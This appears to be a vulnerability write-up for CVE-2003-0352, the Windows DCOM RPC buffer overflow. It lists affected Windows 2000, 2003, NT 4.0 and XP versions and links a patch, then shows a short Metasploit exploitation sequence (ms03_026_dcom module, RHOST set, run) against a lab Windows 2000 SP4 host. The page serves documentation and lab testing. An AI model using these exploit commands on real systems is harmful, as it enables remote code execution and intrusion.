
CVE-2003-0352

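Description

A buffer overflow in certain DCOM interfaces for RPC allows remote attackers to execute arbitrary code via a malformed message.

Affected versions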

Product Version Update Edition Tested
Windows 2000
Windows 2000 SP1
Windows 2000 SP2
Windows 2000 SP3
Windows 2000 SP4
Windows 2003 Server R2 64-bit
Windows 2003 Server R2 Datacenter 64-bit
Windows 2003 Server WEB
Windows 2003 Server Enterprise 64-bit
Windows 2003 Server Enterprise 64-bit
Windows 2003 Server Standard 64-bit
Windows NT 4.0 SP1 Server
Windows NT 4.0 SP5 Server
Windows NT 4.0 SP4 Enterprise Server
Windows NT 4.0 Enterprise Server
Windows NT 4.0 SP6 Workstation
Windows NT 4.0 SP2 Workstation
Windows NT 4.0 SP1 Terminal Server
Windows NT 4.0 SP5 Terminal Server
Windows NT 4.0 SP4 Server
Windows NT 4.0 Server
Windows NT 4.0 SP6a Enterprise Server
Windows NT 4.0 SP3 Enterprise Server
Windows NT 4.0 SP5 Workstation
Windows NT 4.0 SP1 Workstation
Windows NT 4.0 SP4 Terminal Server
Windows NT 4.0 Terminal Server
Windows NT 4.0 SP6a Server
Windows NT 4.0 SP3 Server
Windows NT 4.0 SP6 Enterprise Server
Windows NT 4.0 SP2 Enterprise Server
Windows NT 4.0 SP4 Workstation
Windows NT 4.0 Workstation
Windows NT 4.0 SP6a Terminal Server
Windows NT 4.0 SP3 Terminal Server
Windows NT 4.0 SP6 Server
Windows NT 4.0 SP2 Server
Windows NT 4.0 SP1 Enterprise Server
Windows NT 4.0 SP5 Enterprise Server
Windows NT 4.0 SP6a Workstation
Windows NT 4.0 SP3 Workstation
Windows NT 4.0 SP6 Terminal Server
Windows NT 4.0 SP2 Terminal Server
Windows XP 64-bit
Windows XP Home
Windows XP Gold Professional
Windows XP SP1 64-bit
Windows XP SP1 Home

Patch

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2003-0352

Exploitation

Test system: Windows 2000 SP4 x86

use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run

View system information

[Screenshot: CVE-2003-0352_win2000_x86_msf2]